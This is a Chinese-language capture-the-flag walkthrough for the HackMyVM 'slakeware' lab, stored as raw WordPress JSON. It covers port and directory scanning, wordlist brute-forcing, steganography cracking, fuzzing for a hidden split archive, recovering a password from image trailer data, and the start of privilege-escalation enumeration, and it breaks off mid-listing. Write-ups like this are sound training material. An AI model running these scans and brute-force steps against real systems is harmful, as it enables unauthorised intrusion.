{"id":627,"date":"2024-04-25T22:57:18","date_gmt":"2024-04-25T14:57:18","guid":{"rendered":"http:\/\/162.14.82.114\/?p=627"},"modified":"2024-09-11T14:24:41","modified_gmt":"2024-09-11T06:24:41","slug":"hmv-_-slakeware","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/627\/04\/25\/2024\/","title":{"rendered":"hmv[-_-]slakeware"},"content":{"rendered":"

slakeware<\/h1>\n

\"image-20240425160707699\"<\/div>
\n
\"image-20240425161648293\"<\/div><\/p>\n

\u4fe1\u606f\u641c\u96c6<\/h2>\n

\u7aef\u53e3\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/slakeware]\n\u2514\u2500$ rustscan -a 192.168.0.147 -- -A                       \n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nNmap? More like slowmap.\ud83d\udc22\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.0.147:1\nOpen 192.168.0.147:2\n[~] Starting Script(s)\n[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")\n\n[~] Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-04-25 04:17 EDT\nNSE: Loaded 156 scripts for scanning.\nNSE: Script Pre-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 04:17\nCompleted NSE at 04:17, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 04:17\nCompleted NSE at 04:17, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 04:17\nCompleted NSE at 04:17, 0.00s elapsed\nInitiating Ping Scan at 04:17\nScanning 192.168.0.147 [2 ports]\nCompleted Ping Scan at 04:17, 0.00s elapsed (1 total hosts)\nInitiating Parallel DNS resolution of 1 host. at 04:17\nCompleted Parallel DNS resolution of 1 host. at 04:17, 0.01s elapsed\nDNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]\nInitiating Connect Scan at 04:17\nScanning slackware (192.168.0.147) [2 ports]\nDiscovered open port 1\/tcp on 192.168.0.147\nDiscovered open port 2\/tcp on 192.168.0.147\nCompleted Connect Scan at 04:17, 0.00s elapsed (2 total ports)\nInitiating Service scan at 04:17\nScanning 2 services on slackware (192.168.0.147)\nCompleted Service scan at 04:17, 11.08s elapsed (2 services on 1 host)\nNSE: Script scanning 192.168.0.147.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 04:17\nCompleted NSE at 04:17, 0.47s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 04:17\nCompleted NSE at 04:17, 0.01s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 04:17\nCompleted NSE at 04:17, 0.00s elapsed\nNmap scan report for slackware (192.168.0.147)\nHost is up, received conn-refused (0.0014s latency).\nScanned at 2024-04-25 04:17:00 EDT for 12s\n\nPORT  STATE SERVICE REASON  VERSION\n1\/tcp open  ssh     syn-ack OpenSSH 9.3 (protocol 2.0)\n| ssh-hostkey: \n|   256 e2:66:60:79:bc:d1:33:2e:c1:25:fa:99:e5:89:1e:d3 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJcZY4GWIximmdPsABxAYaWgO1m0N7pVq2ce7e5tg7ll2XkNtrin7qN520RUcubKdKhR7uVcZS\/FsAg9ChHCgLE=\n|   256 98:59:c3:a8:2b:89:56:77:eb:72:4a:05:90:21:cb:40 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB3Vv5eWXgC7mWGGeXdd+jVBETQZmJs5JsPH\/51Tnxgh\n2\/tcp open  http    syn-ack Apache httpd 2.4.58 ((Unix))\n| http-methods: \n|   Supported Methods: HEAD GET POST OPTIONS TRACE\n|_  Potentially risky methods: TRACE\n|_http-server-header: Apache\/2.4.58 (Unix)\n|_http-title: Tribute to Slackware\n\nNSE: Script Post-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 04:17\nCompleted NSE at 04:17, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 04:17\nCompleted NSE at 04:17, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 04:17\nCompleted NSE at 04:17, 0.00s elapsed\nRead data files from: \/usr\/bin\/..\/share\/nmap\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 12.39 seconds<\/code><\/pre>\n
\u76ee\u5f55\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/slakeware]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.147:2\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.0.147:2\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php,zip,bak,jpg,txt,html\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.html           (Status: 200) [Size: 7511]\n\/.html                (Status: 403) [Size: 199]\n\/background.jpg       (Status: 200) [Size: 13798]\n\/robots.txt           (Status: 200) [Size: 21]\n\/.html                (Status: 403) [Size: 199]\n\/getslack             (Status: 301) [Size: 240] [--> http:\/\/192.168.0.147:2\/getslack\/]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/slakeware]\n\u2514\u2500$ sudo dirsearch -u http:\/\/192.168.0.147:2\/ -e* -i 200,300-399 2>\/dev\/null        \n\n  _|. _ _  _  _  _ _|_    v0.4.3\n (_||| _) (\/_(_|| (_| )\n\nExtensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25 | Wordlist size: 14594\n\nOutput File: \/home\/kali\/temp\/slakeware\/reports\/http_192.168.0.147_2\/__24-04-25_04-23-30.txt\n\nTarget: http:\/\/192.168.0.147:2\/\n\n[04:23:30] Starting: \n[04:23:44] 200 -    1KB - \/cgi-bin\/test-cgi\n[04:23:44] 200 -  820B  - \/cgi-bin\/printenv\n[04:24:00] 200 -   21B  - \/robots.txt\n\nTask Completed<\/code><\/pre>\n
\u6f0f\u6d1e\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/slakeware]\n\u2514\u2500$ nikto -h http:\/\/192.168.0.147:2\n- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP:          192.168.0.147\n+ Target Hostname:    192.168.0.147\n+ Target Port:        2\n+ Start Time:         2024-04-25 04:18:40 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: Apache\/2.4.58 (Unix)\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ No CGI Directories found (use '-C all' to force check all possible dirs)\n+ OPTIONS: Allowed HTTP Methods: HEAD, GET, POST, OPTIONS, TRACE .\n+ \/: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https:\/\/owasp.org\/www-community\/attacks\/Cross_Site_Tracing\n+ 8101 requests: 0 error(s) and 4 item(s) reported on remote host\n+ End Time:           2024-04-25 04:18:56 (GMT-4) (16 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n
\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n
\u8e29\u70b9<\/h3>\n
\"image-20240425161919370\"<\/div><\/p>\n
\u5230\u5904\u70b9\u70b9\uff0c\u627e\u5230\u4e86\uff1a<\/p>\n
https:\/\/www.slackware.com\/infra\/keys\/GPG-KEY<\/code><\/pre>\n
security@slackware.com public key\n\npub   1024D\/40102233 2003-02-26 [expires: 2038-01-19]\nuid                  Slackware Linux Project <security@slackware.com>\nsub   1024g\/4E523569 2003-02-26 [expires: 2038-01-19]\n\n-----BEGIN PGP PUBLIC KEY BLOCK-----\nVersion: GnuPG v1.4.12 (GNU\/Linux)\n\nmQGiBD5dIFQRBADB31WinbXdaGk\/8RNkpnZclu1w3Xmd5ItACDLB2FhOhArw35EA\nMOYzxI0gRtDNWN4pn9n74q4HbFzyRWElThWRtBTYLEpImzrk7HYVCjMxjw5A0fTr\n88aiHOth5aS0vPAoq+3TYn6JDSipf2bR03G2JVwgj3Iu066pX4naivNm8wCgldHG\nF3y9vT3UPYh3QFgEUlCalt0D\/3n6NopRYy0hMN6BPu+NarXwv6NQ9g0GV5FNjEEr\nigkrD\/htqCyWAUl8zyCKKUFZZx4UGBRZ5guCdNzwgYH3yn3aVMhJYQ6tcSlLsj3f\nJIz4LAZ3+rI77rbn7gHHdp7CSAuV+QHv3aNanUD\/KGz5SPSvF4w+5qRM4PfPNT1h\nLMV8BACzxiyX7vzeE4ZxNYvcuCtv0mvEHl9yD66NFA35RvXaO0QiRVYeoUa5JOQZ\ngwq+fIB0zgsEYDhXFkC1hM\/QL4NccMRk8C09nFn4eiz4dAEnwKt4rLCJKhkLl1DW\nTSoXHe\/dOXaLnFyLzB1J8hEYmUvw3SwPt\/\/wMqDiVBLeZfFcdLQwU2xhY2t3YXJl\nIExpbnV4IFByb2plY3QgPHNlY3VyaXR5QHNsYWNrd2FyZS5jb20+iF8EExECAB8E\nCwcDAgMVAgMDFgIBAh4BAheABQJQPlypBQlBo7MrAAoJEGpEY8BAECIzjOwAn3vp\ntb6K1v2wLI9eVlnCdx4m1btpAJ9sFt4KwJrEdiO5wFC4xe9G4eZl4rkBDQQ+XSBV\nEAQA3VYlpPyRKdOKoM6t1SwNG0YgVFSvxy\/eiratBf7misDBsJeH86Pf8H9OfVHO\ncqscLiC+iqvDgqeTUX9vASjlnvcoS\/3H5TDPlxiifIDggqd2euNtJ8+lyXRBV6yP\nsBIA6zki9cR4zphe48hKpSsDfj7uL5sfyc2UmKKboSu3x7cAAwUD\/1jmoLQs9bIt\nbTosoy+5+Uzrl0ShRlv+iZV8RPzAMFuRJNxUJkUmmThowtXRaPKFI9AVd+pP44aA\nJ+zxCPtS2isiW20AxubJoBPpXcVatJWi4sG+TM5Z5VRoLg7tIDNVWsyHGXPAhIG2\nY8Z1kyWwb4P8A\/W2b1ZCqS7Fx4yEhTikiEwEGBECAAwFAlA+XL8FCUGjs2IACgkQ\nakRjwEAQIjMsbQCgk59KFTbTlZfJ6FoZjjEmK3\/xGR4AniYT+EdSdvEyRtZYkqWz\np1ayvO1b\n=tibb\n-----END PGP PUBLIC KEY BLOCK-----<\/code><\/pre>\n
\u4f46\u662f\u6ca1\u5565\u60f3\u6cd5\u3002<\/p>\n
\u5c1d\u8bd5\u4f01\u56fe\u7206\u7834<\/h3>\n
\u6587\u5b57\u597d\u591a\uff0c\u5148cewl<\/code>\u4e00\u4e2a\u5b57\u5178\uff1a<\/p>\n
cewl http:\/\/192.168.0.147:2\/ --with-numbers -d 3 -m 6 -w pass.txt<\/code><\/pre>\n
\u540e\u53f0\u4e22\u7740\u7206\u7834\uff0c\u53d1\u73b0\u7206\u7834\u4e0d\u4e86\u3002<\/p>\n
\u5c06\u7c97\u7684\u8fdb\u884c\u6536\u96c6\uff0c\u5c1d\u8bd5\u7206\u7834\uff1a<\/p>\n
1993\nPatrick Volkerding\nSlackware 15\nSlackware15\nLILO\nELILO\nifconfig\nSystem V\nReiserFS\neth0\nenp0s25f0u1c2i2\nslakeware15<\/code><\/pre>\n
\u4e5f\u5bc4\u3002<\/p>\n
\u654f\u611f\u76ee\u5f55<\/h3>\n
http:\/\/192.168.0.147:2\/robots.txt<\/code><\/pre>\n
User-agent: *\n#7z.001<\/code><\/pre>\n
http:\/\/192.168.0.147:2\/cgi-bin\/printenv<\/code><\/pre>\n
#\n\n# To permit this cgi, replace # on the first line above with the\n# appropriate #!\/path\/to\/perl shebang, and on Unix \/ Linux also\n# set this script executable with chmod 755.\n#\n# ***** !!! WARNING !!! *****\n# This script echoes the server environment variables and therefore\n# leaks information - so NEVER use it in a live server environment!\n# It is provided only for testing purpose.\n# Also note that it is subject to cross site scripting attacks on\n# MS IE and any other browser which fails to honor RFC2616. \n\n##\n##  printenv -- demo CGI program which just prints its environment\n##\nuse strict;\nuse warnings;\n\nprint "Content-type: text\/plain; charset=iso-8859-1\\n\\n";\nforeach my $var (sort(keys(%ENV))) {\n    my $val = $ENV{$var};\n    $val =~ s|\\n|\\\\n|g;\n    $val =~ s|"|\\\\"|g;\n    print "${var}=\\"${val}\\"\\n";\n}\n<\/code><\/pre>\n
http:\/\/192.168.0.147:2\/cgi-bin\/test-cgi<\/code><\/pre>\n
#\n\n# To permit this cgi, replace # on the first line above with the\n# appropriate #!\/path\/to\/sh shebang, and set this script executable\n# with chmod 755.\n#\n# ***** !!! WARNING !!! *****\n# This script echoes the server environment variables and therefore\n# leaks information - so NEVER use it in a live server environment!\n# It is provided only for testing purpose.\n# Also note that it is subject to cross site scripting attacks on\n# MS IE and any other browser which fails to honor RFC2616. \n\n# disable filename globbing\nset -f\n\necho "Content-type: text\/plain; charset=iso-8859-1"\necho\n\necho CGI\/1.0 test script report:\necho\n\necho argc is $#. argv is "$*".\necho\n\necho SERVER_SOFTWARE = $SERVER_SOFTWARE\necho SERVER_NAME = $SERVER_NAME\necho GATEWAY_INTERFACE = $GATEWAY_INTERFACE\necho SERVER_PROTOCOL = $SERVER_PROTOCOL\necho SERVER_PORT = $SERVER_PORT\necho REQUEST_METHOD = $REQUEST_METHOD\necho HTTP_ACCEPT = "$HTTP_ACCEPT"\necho PATH_INFO = "$PATH_INFO"\necho PATH_TRANSLATED = "$PATH_TRANSLATED"\necho SCRIPT_NAME = "$SCRIPT_NAME"\necho QUERY_STRING = "$QUERY_STRING"\necho REMOTE_HOST = $REMOTE_HOST\necho REMOTE_ADDR = $REMOTE_ADDR\necho REMOTE_USER = $REMOTE_USER\necho AUTH_TYPE = $AUTH_TYPE\necho CONTENT_TYPE = $CONTENT_TYPE\necho CONTENT_LENGTH = $CONTENT_LENGTH<\/code><\/pre>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/slakeware]\n\u2514\u2500$ exiftool background.jpg \nExifTool Version Number         : 12.76\nFile Name                       : background.jpg\nDirectory                       : .\nFile Size                       : 14 kB\nFile Modification Date\/Time     : 2000:11:10 00:43:33-05:00\nFile Access Date\/Time           : 2024:04:25 05:04:56-04:00\nFile Inode Change Date\/Time     : 2024:04:25 05:04:56-04:00\nFile Permissions                : -rw-r--r--\nFile Type                       : JPEG\nFile Type Extension             : jpg\nMIME Type                       : image\/jpeg\nJFIF Version                    : 1.01\nResolution Unit                 : inches\nX Resolution                    : 72\nY Resolution                    : 72\nImage Width                     : 362\nImage Height                    : 242\nEncoding Process                : Progressive DCT, Huffman coding\nBits Per Sample                 : 8\nColor Components                : 3\nY Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)\nImage Size                      : 362x242\nMegapixels                      : 0.088\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/slakeware]\n\u2514\u2500$ stegseek -wl \/usr\/share\/wordlists\/rockyou.txt background.jpg \nStegSeek 0.6 - https:\/\/github.com\/RickdeJager\/StegSeek\n\n[i] Progress: 99.54% (132.8 MB)           \n[!] error: Could not find a valid passphrase.<\/code><\/pre>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/slakeware]\n\u2514\u2500$ curl http:\/\/192.168.0.147:2\/getslack                                                                                \n<!DOCTYPE HTML PUBLIC "-\/\/IETF\/\/DTD HTML 2.0\/\/EN">\n<html><head>\n<title>301 Moved Permanently<\/title>\n<\/head><body>\n<h1>Moved Permanently<\/h1>\n<p>The document has moved <a href="http:\/\/192.168.0.147:2\/getslack\/">here<\/a>.<\/p>\n<\/body><\/html>\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/slakeware]\n\u2514\u2500$ curl http:\/\/192.168.0.147:2\/getslack\/\nsearch here<\/code><\/pre>\n
FUZZ<\/h3>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/slakeware]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.147:2\/getslack\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.0.147:2\/getslack\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              txt,html,php,zip,bak,jpg\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.html                (Status: 403) [Size: 199]\n\/index.html           (Status: 200) [Size: 12]\n\/.html                (Status: 403) [Size: 199]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n
\u5c1d\u8bd5FUZZ\u4e00\u4e0b7z.001<\/code>\uff0c\u5b9e\u9645\u4e0a\u662f\u7fa4\u91cc\u5e08\u5085\u5148\u53d1\u73b0\u7684\uff01\uff01\uff01\uff01<\/p>\n
\"image-20240425171527882\"<\/div><\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/slakeware]\n\u2514\u2500$ wfuzz -w \/usr\/share\/seclists\/Discovery\/Web-Content\/raft-small-words-lowercase.txt -u http:\/\/192.168.0.147:2\/getslack\/FUZZ.7z.001 --hw 23 --sc 200\n \/usr\/lib\/python3\/dist-packages\/wfuzz\/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.\n********************************************************\n* Wfuzz 3.1.0 - The Web Fuzzer                         *\n********************************************************\n\nTarget: http:\/\/192.168.0.147:2\/getslack\/FUZZ.7z.001\nTotal requests: 38267\n\n=====================================================================\nID           Response   Lines    Word       Chars       Payload                                                                                \n=====================================================================\n\n000001220:   200        80 L     794 W      19474 Ch    "twitter"                                                                              \n\nTotal time: 31.73400\nProcessed Requests: 38267\nFiltered Requests: 38266\nRequests\/sec.: 1205.867<\/code><\/pre>\n
\u8fd9\u5c31\u53eb\u9762\u5411\u7ed3\u679c\u7684\u7f16\u7a0b\uff01<\/p>\n
\u4e0b\u8f7d\u4e00\u4e0b\uff1a<\/p>\n
for i in $(seq 1 20); do wget http:\/\/192.168.0.147:2\/getslack\/twitter.7z.00$i; done\nfor i in $(seq 1 20); do wget http:\/\/192.168.0.147:2\/getslack\/twitter.7z.0$i; done\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/slakeware]\n\u2514\u2500$ ls -la                                                                             \ntotal 300\ndrwxr-xr-x  3 kali kali  4096 Apr 25 05:28 .\ndrwxr-xr-x 69 kali kali  4096 Apr 25 04:16 ..\n-rw-r--r--  1 kali kali 13798 Nov 10  2000 background.jpg\n-rw-r--r--  1 kali kali  1497 Apr 25 04:22 pass.txt\ndrwxr-xr-x  3 root root  4096 Apr 25 04:23 reports\n-rw-r--r--  1 kali kali   114 Apr 25 04:44 temp.txt\n-rw-r--r--  1 kali kali 20480 Mar 10 17:02 twitter.7z.001\n-rw-r--r--  1 kali kali 20480 Mar 10 17:02 twitter.7z.002\n-rw-r--r--  1 kali kali 20480 Mar 10 17:02 twitter.7z.003\n-rw-r--r--  1 kali kali 20480 Mar 10 17:02 twitter.7z.004\n-rw-r--r--  1 kali kali 20480 Mar 10 17:02 twitter.7z.005\n-rw-r--r--  1 kali kali 20480 Mar 10 17:02 twitter.7z.006\n-rw-r--r--  1 kali kali 20480 Mar 10 17:02 twitter.7z.007\n-rw-r--r--  1 kali kali 20480 Mar 10 17:02 twitter.7z.008\n-rw-r--r--  1 kali kali 20480 Mar 10 17:02 twitter.7z.009\n-rw-r--r--  1 kali kali 20480 Mar 10 17:02 twitter.7z.010\n-rw-r--r--  1 kali kali 20480 Mar 10 17:02 twitter.7z.011\n-rw-r--r--  1 kali kali 20480 Mar 10 17:02 twitter.7z.012\n-rw-r--r--  1 kali kali 20480 Mar 10 17:02 twitter.7z.013\n-rw-r--r--  1 kali kali  1860 Mar 10 17:02 twitter.7z.014<\/code><\/pre>\n
\u63d0\u53d6\u6587\u4ef6<\/h3>\n
\u89e3\u538b\u7f29\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/slakeware]\n\u2514\u2500$ 7z x twitter.7z.001                  \n\n7-Zip 23.01 (x64) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20\n 64-bit locale=en_US.UTF-8 Threads:2 OPEN_MAX:1024\n\nScanning the drive for archives:\n1 file, 20480 bytes (20 KiB)\n\nExtracting archive: twitter.7z.001\n--         \nPath = twitter.7z.001\nType = Split\nPhysical Size = 20480\nVolumes = 14\nTotal Physical Size = 268100\n----\nPath = twitter.7z\nSize = 268100\n--\nPath = twitter.7z\nType = 7z\nPhysical Size = 268100\nHeaders Size = 130\nMethod = LZMA2:384k\nSolid = -\nBlocks = 1\n\nEverything is Ok\n\nSize:       267951\nCompressed: 268100<\/code><\/pre>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/slakeware]\n\u2514\u2500$ exiftool twitter.png                 \nExifTool Version Number         : 12.76\nFile Name                       : twitter.png\nDirectory                       : .\nFile Size                       : 268 kB\nFile Modification Date\/Time     : 2024:03:10 16:42:47-04:00\nFile Access Date\/Time           : 2024:04:25 05:31:09-04:00\nFile Inode Change Date\/Time     : 2024:04:25 05:31:09-04:00\nFile Permissions                : -rw-r--r--\nFile Type                       : PNG\nFile Type Extension             : png\nMIME Type                       : image\/png\nImage Width                     : 400\nImage Height                    : 400\nBit Depth                       : 8\nColor Type                      : RGB\nCompression                     : Deflate\/Inflate\nFilter                          : Adaptive\nInterlace                       : Noninterlaced\nProfile Name                    : icc\nProfile CMM Type                : Little CMS\nProfile Version                 : 4.4.0\nProfile Class                   : Display Device Profile\nColor Space Data                : RGB\nProfile Connection Space        : XYZ\nProfile Date Time               : 2022:12:19 06:28:40\nProfile File Signature          : acsp\nPrimary Platform                : Apple Computer Inc.\nCMM Flags                       : Not Embedded, Independent\nDevice Manufacturer             : \nDevice Model                    : \nDevice Attributes               : Reflective, Glossy, Positive, Color\nRendering Intent                : Perceptual\nConnection Space Illuminant     : 0.9642 1 0.82491\nProfile Creator                 : Little CMS\nProfile ID                      : 0\nProfile Description             : GIMP built-in sRGB\nProfile Copyright               : Public Domain\nMedia White Point               : 0.9642 1 0.82491\nChromatic Adaptation            : 1.04788 0.02292 -0.05022 0.02959 0.99048 -0.01707 -0.00925 0.01508 0.75168\nRed Matrix Column               : 0.43604 0.22249 0.01392\nBlue Matrix Column              : 0.14305 0.06061 0.71393\nGreen Matrix Column             : 0.38512 0.7169 0.09706\nRed Tone Reproduction Curve     : (Binary data 32 bytes, use -b option to extract)\nGreen Tone Reproduction Curve   : (Binary data 32 bytes, use -b option to extract)\nBlue Tone Reproduction Curve    : (Binary data 32 bytes, use -b option to extract)\nChromaticity Channels           : 3\nChromaticity Colorant           : Unknown\nChromaticity Channel 1          : 0.64 0.33002\nChromaticity Channel 2          : 0.3 0.60001\nChromaticity Channel 3          : 0.15001 0.06\nDevice Mfg Desc                 : GIMP\nDevice Model Desc               : sRGB\nWhite Point X                   : 0.3127\nWhite Point Y                   : 0.329\nRed X                           : 0.64\nRed Y                           : 0.33\nGreen X                         : 0.3\nGreen Y                         : 0.6\nBlue X                          : 0.15\nBlue Y                          : 0.06\nWarning                         : [minor] Trailer data after PNG IEND chunk\nImage Size                      : 400x400\nMegapixels                      : 0.160<\/code><\/pre>\n
\u770b\u770b\u5565\u60c5\u51b5\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/slakeware]\n\u2514\u2500$ tail twitter.png\ntrYth1sPasS1993<\/code><\/pre>\n
\u770b\u4e00\u4e0b\u7167\u7247\uff1a<\/p>\n
\"image-20240425174205430\"<\/div><\/p>\n
\u521a\u7206\u7834\u5230\u4e00\u534a\uff0cumz<\/code>\u5e08\u5085\u4f20\u6765\u4e86\u559c\u8baf\uff1a<\/p>\n
\"image-20240425174003292\"<\/div>
\n
\"image-20240425174257587\"<\/div><\/p>\n
\u5e08\u5085\u725b\u6279\uff01\uff01\uff01<\/p>\n
\u63d0\u6743<\/h2>\n
\u4fe1\u606f\u641c\u96c6<\/h3>\n
(remote) patrick@slackware.slackware.local:\/home\/patrick$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/bin\/su\n\/bin\/ping\n\/bin\/mount\n\/bin\/umount\n\/bin\/ntfs-3g\n\/bin\/fusermount\n\/usr\/bin\/at\n\/usr\/bin\/cu\n\/usr\/bin\/ksu\n\/usr\/bin\/rcp\n\/usr\/bin\/rsh\n\/usr\/bin\/uux\n\/usr\/bin\/chfn\n\/usr\/bin\/chsh\n\/usr\/bin\/newuidmap\n\/usr\/bin\/sudo\n\/usr\/bin\/uucp\n\/usr\/bin\/crontab\n\/usr\/bin\/chage\n\/usr\/bin\/afppasswd\n\/usr\/bin\/fusermount3\n\/usr\/bin\/fdmount\n\/usr\/bin\/expiry\n\/usr\/bin\/newgrp\n\/usr\/bin\/passwd\n\/usr\/bin\/gpasswd\n\/usr\/bin\/pkexec\n\/usr\/bin\/rlogin\n\/usr\/bin\/uuname\n\/usr\/bin\/uustat\n\/usr\/bin\/procmail\n\/usr\/bin\/newgidmap\n\/usr\/lib\/polkit-1\/polkit-agent-helper-1\n\/usr\/sbin\/uuxqt\n\/usr\/sbin\/uucico\n\/usr\/libexec\/lxc\/lxc-user-nic\n\/usr\/libexec\/dbus-daemon-launch-helper\n\/usr\/libexec\/ssh-keysign\n\/sbin\/unix_chkpwd\n\/sbin\/mount.nfs\n(remote) patrick@slackware.slackware.local:\/home\/patrick$ \/usr\/sbin\/getcap -r \/ 2>\/dev\/null\n(remote) patrick@slackware.slackware.local:\/home\/patrick$ cd ..\n(remote) patrick@slackware.slackware.local:\/home$ ls -la\ntotal 2\ndrwxr-xr-x 54 root       root       1400 Mar 10 22:16 .\/\ndrwxr-xr-x 23 root       root        536 Mar 10 16:29 ..\/\ndrwxr-x---  2 0xeex75    0xeex75      80 Mar 10 22:15 0xeex75\/\ndrwxr-x---  2 0xh3rshel  0xh3rshel    80 Mar 11 12:41 0xh3rshel\/\ndrwxr-x---  2 0xjin      0xjin        80 Mar 10 22:16 0xjin\/\ndrwxr-x---  2 aceomn     ch4rm       112 Mar 10 22:15 aceomn\/\ndrwxr-x---  2 alienum    claor       112 Mar 10 22:15 alienum\/\ndrwxr-x---  2 annlynn    mrmidnight  112 Mar 10 22:15 annlynn\/\ndrwxr-x---  2 avijneyam  d3b0o       112 Mar 10 22:15 avijneyam\/\ndrwxr-x---  2 b4el7d     ziyos       112 Mar 10 22:15 b4el7d\/\ndrwxr-x---  2 bit        whitecr0wz  112 Mar 10 22:15 bit\/\ndrwxr-x---  2 boyras200  c4rta       112 Mar 10 22:15 boyras200\/\ndrwxr-x---  2 c4rta      kaian       112 Mar 10 22:15 c4rta\/\ndrwxr-x---  2 catch_me75 h1dr0       112 Mar 10 22:15 catch_me75\/\ndrwxr-x---  2 ch4rm      gatogamer   112 Mar 10 22:15 ch4rm\/\ndrwxr-x---  2 claor      kretinga    112 Mar 10 22:15 claor\/\ndrwxr-x---  2 cromiphi   rijaba1     112 Mar 10 22:15 cromiphi\/\ndrwxr-x---  2 d3b0o      kerszi      112 Mar 10 22:15 d3b0o\/\ndrwxr-x---  2 emvee      sml         144 Mar 11 11:39 emvee\/\ndrwxr-x---  2 root       root         48 Dec 20 21:35 ftp\/\ndrwxr-x---  2 gatogamer  cromiphi    112 Mar 10 22:15 gatogamer\/\ndrwxr-x---  2 h1dr0      rpj7        112 Mar 10 22:15 h1dr0\/\ndrwxr-x---  2 icex64     x4v1l0k     112 Mar 10 22:15 icex64\/\ndrwxr-x---  2 infayerts  bit         112 Mar 10 22:15 infayerts\/\ndrwxr-x---  2 josemlwdf  catch_me75  112 Mar 10 22:15 